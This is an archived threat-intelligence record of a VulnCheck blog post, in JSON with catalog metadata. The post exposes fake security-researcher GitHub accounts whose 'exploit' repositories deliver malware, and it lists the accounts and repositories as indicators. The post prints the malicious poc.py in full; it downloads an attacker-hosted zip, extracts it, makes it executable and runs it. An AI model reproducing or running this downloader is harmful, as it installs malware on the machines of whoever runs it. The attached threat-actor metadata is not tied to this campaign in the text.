{
	"id": "a73fca74-f66f-429f-b97a-cd7a9a066605",
	"created_at": "2026-04-06T00:15:59.763857Z",
	"updated_at": "2026-04-10T03:36:48.21852Z",
	"deleted_at": null,
	"sha1_hash": "995f2a911d48787a23baccbd3704e01893cf2a83",
	"title": "Fake Security Researcher GitHub Repositories Deliver Malicious Implant Blog - VulnCheck | Blog | VulnCheck",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2175093,
	"plain_text": "Fake Security Researcher GitHub Repositories Deliver Malicious\r\nImplant Blog - VulnCheck | Blog | VulnCheck\r\nPublished: 2023-06-14 · Archived: 2026-04-05 20:28:02 UTC\r\nFake Security Researcher GitHub Repositories Deliver Malicious Implant\r\nIn early May, VulnCheck came across a malicious GitHub repository that claimed to be a Signal 0-day. The team\r\nreported the repository to GitHub, and it was quickly taken down. The same scenario continued throughout May.\r\nRecently, the individuals creating these repositories have put significant effort into making them look legitimate\r\nby creating a network of accounts and Twitter profiles, pretending to be part of a non-existent company called\r\nHigh Sierra Cyber Security, and even using headshots of legitimate security researchers from companies like\r\nRapid7.\r\nEach High Sierra Cyber Security account contains a malicious repository claiming to be an exploit for a well-known product, including Chrome, Exchange, Discord, and more. Some of the accounts even advertise their\r\n“findings” on Twitter.\r\nSecurity researchers should understand that they are useful targets for malicious actors and should be careful when\r\ndownloading code from GitHub. Always review the code you are executing, and don’t use anything you don’t\r\nunderstand.\r\nAs part of VulnCheck’s Exploit Intelligence offering, we monitor and review large amounts of GitHub\r\nrepositories. The review process exists to filter out useless, malicious, and/or scam repositories. In early May,\r\nduring routine reviews, we came across an obviously malicious GitHub repository that claimed to be a Signal 0-day.\r\nWe reported the repository to GitHub, and it was quickly taken down.\r\nThe very next day, an almost identical repository was created under a different account, but this time claiming to\r\nbe a WhatsApp zero-day. Again, we worked with GitHub to get the repository taken down. 
This process kept\r\nrepeating itself throughout May.\r\nMore recently, however, the individual(s) creating these repositories have put more effort into making them look\r\nlegitimate by creating a network of accounts. The attacker has created half a dozen GitHub accounts and a handful\r\nof associated Twitter accounts. The accounts all pretend to be part of a non-existent security company called High\r\nSierra Cyber Security. Below is an example of one such account:\r\nhttps://vulncheck.com/blog/fake-repos-deliver-malicious-implant\r\nPage 1 of 6\n\nThe profile looks like a normal security researcher account. The account has a headshot, followers, an associated\r\norganization, a Twitter handle, and a (dead) link to the company’s website. However, we recognized “Andrei\r\nKuzman” was using a headshot of a Rapid7 employee. So it appears the attacker is not only making efforts to\r\nmake the profiles look legitimate, but also using headshots of actual security researchers.\r\nEach High Sierra Cyber Security account contains a malicious repository claiming to be an exploit for a well-known product: Chrome, Exchange, Discord, etc. Some of the accounts even advertise their “findings” on Twitter:\r\nThe repositories all follow a very simple formula. They all look like the following image (including tagging of\r\n“hot” CVE to attract victims):\r\npoc.py contains the code to download a malicious binary, and then execute it. The python script will download a\r\ndifferent payload depending on the victim’s host operating system. 
The above Discord “0-day” uses the following\r\ncode to perform these actions:\r\nif __name__ == '__main__':\r\n if os.name == 'nt':\r\n try:\r\n namezip = \"cveswindows.zip\"\r\n name = \"cveswindows\"\r\n url = \"https://github.com/GSandersonHSCS/discord-0-day-fix/raw/main/gitignore/cveswindows.zip\"\r\n des = os.path.join(os.environ['TMP'], namezip)\r\n if not os.path.exists(os.path.join(os.environ['TMP'], name, name + \".exe\")):\r\n urllib.request.urlretrieve(url, des)\r\n with open(des, 'wb') as f: f.write(urllib.request.urlopen(url).read())\r\n zf = ZipFile(des, 'r')\r\n zf.extractall(os.path.join(os.environ['TMP'], name))\r\n zf.close()\r\n pid = subprocess.Popen([os.path.join(os.environ['TMP'], name, name + \".exe\")], creationflags=0x0\r\n except:\r\n pass\r\n else:\r\n url = \"https://github.com/GSandersonHSCS/discord-0-day-fix/raw/main/gitignore/cveslinux.zip\"\r\n namezip = \"cveslinux.zip\"\r\n name = \"cveslinux\"\r\n des = os.path.join(\"/home/\" + os.environ[\"USERNAME\"] + \"/.local/share\", namezip)\r\n if not os.path.exists(os.path.join(\"/home/\" + os.environ[\"USERNAME\"] + \"/.local/share\", name, name)):\r\n urllib.request.urlretrieve(url, des)\r\n with open(des, 'wb') as f: f.write(urllib.request.urlopen(url).read())\r\n zf = ZipFile(des, 'r')\r\n zf.extractall(os.path.join(\"/home/\" + os.environ[\"USERNAME\"] + \"/.local/share\", name))\r\n zf.close()\r\n st = os.stat(os.path.join(\"/home/\" + os.environ[\"USERNAME\"] + \"/.local/share\", name, name))\r\n os.chmod(os.path.join(\"/home/\" + os.environ[\"USERNAME\"] + \"/.local/share\", name, name), st.st_mode\r\n subprocess.Popen([\"/bin/bash\", \"-c\", os.path.join(\"/home/\" + os.environ[\"USERNAME\"] + \"/.local/share\r\n main()\r\nAbove, poc.py downloads one of two zip files. cveslinux.zip or cveswindows.zip are fetched from GitHub,\r\nunzipped, written to disk, and executed. 
The Windows binary has a very high detection rate on VirusTotal (43/71).\r\nThe Linux binary has a much lower one (3/62), but it contains some very obvious strings indicating its nature.\r\nThe attacker has made a lot of effort to create all these fake personas, only to deliver very obvious malware. It’s\r\nunclear if they have been successful, but given that they’ve continued to pursue this avenue of attacks, it seems\r\nthey believe they will be successful.\r\nIt isn’t clear if this is a single individual with too much time on their hands, or something more advanced like the\r\ncampaign uncovered by Google TAG in January 2021. Either way, security researchers should understand that\r\nthey are useful targets for malicious actors and should be careful when downloading code from GitHub. Always\r\nreview the code you are executing and don’t use anything you don’t understand.\r\nIf you have engaged with any of the following accounts, consider the possibility that you’ve been compromised.\r\nGitHub accounts:\r\n1. https://github.com/AKuzmanHSCS\r\n2. https://github.com/RShahHSCS\r\n3. https://github.com/BAdithyaHSCS\r\n4. https://github.com/DLandonHSCS\r\n5. https://github.com/MHadzicHSCS\r\n6. https://github.com/GSandersonHSCS\r\n7. https://github.com/SSankkarHSCS\r\nGitHub repositories:\r\n1. https://github.com/AKuzmanHSCS/Microsoft-Exchange-RCE\r\n2. https://github.com/MHadzicHSCS/Chrome-0-day\r\n3. https://github.com/GSandersonHSCS/discord-0-day-fix\r\n4. https://github.com/BAdithyaHSCS/Exchange-0-Day\r\n5. https://github.com/RShahHSCS/Discord-0-Day-Exploit\r\n6. https://github.com/DLandonHSCS/Discord-RCE\r\n7. https://github.com/SSankkarHSCS/Chromium-0-Day\r\nTwitter accounts:\r\n1. https://twitter.com/AKuzmanHSCS\r\n2. https://twitter.com/DLandonHSCS\r\n3. https://twitter.com/GSandersonHSCS\r\n4. 
https://twitter.com/MHadzicHSCS\r\nSource: https://vulncheck.com/blog/fake-repos-deliver-malicious-implant",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://vulncheck.com/blog/fake-repos-deliver-malicious-implant"
	],
	"report_names": [
		"fake-repos-deliver-malicious-implant"
	],
	"threat_actors": [
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434559,
	"ts_updated_at": 1775792208,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/995f2a911d48787a23baccbd3704e01893cf2a83.pdf",
		"text": "https://archive.orkl.eu/995f2a911d48787a23baccbd3704e01893cf2a83.txt",
		"img": "https://archive.orkl.eu/995f2a911d48787a23baccbd3704e01893cf2a83.jpg"
	}
}